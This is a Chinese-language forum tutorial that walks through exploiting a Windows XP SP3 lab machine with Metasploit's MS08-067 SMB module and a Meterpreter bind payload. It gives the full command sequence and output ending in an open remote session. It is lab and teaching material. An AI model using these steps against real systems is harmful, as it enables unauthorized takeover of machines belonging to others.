|
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole:
[pre]msfconsole
[/pre]
选择一个漏洞
[pre]
msf > search platform: windows xp sp3
[/pre]
exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。 查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:
[pre]
msf > info exploit/windows/smb/ms08_067_netapi
[/pre]
依次执行如下命令:
[pre]
msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108 (设置目标主机IP地址)
> exploit
[/pre]
如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。
[pre] Started bind handler Automatically detecting the target... Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese Selected Target: Windows XP SP3 Chinese (AlwaysOn NK) Attempting to trigger the vulnerability... Sending stage (751104 bytes) to 192.168.0.108 Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32
meterpreter >
[/pre]
| 
[复制链接]
发表于 2018-9-20 11:13:12
发表于 2018-9-22 13:54:06
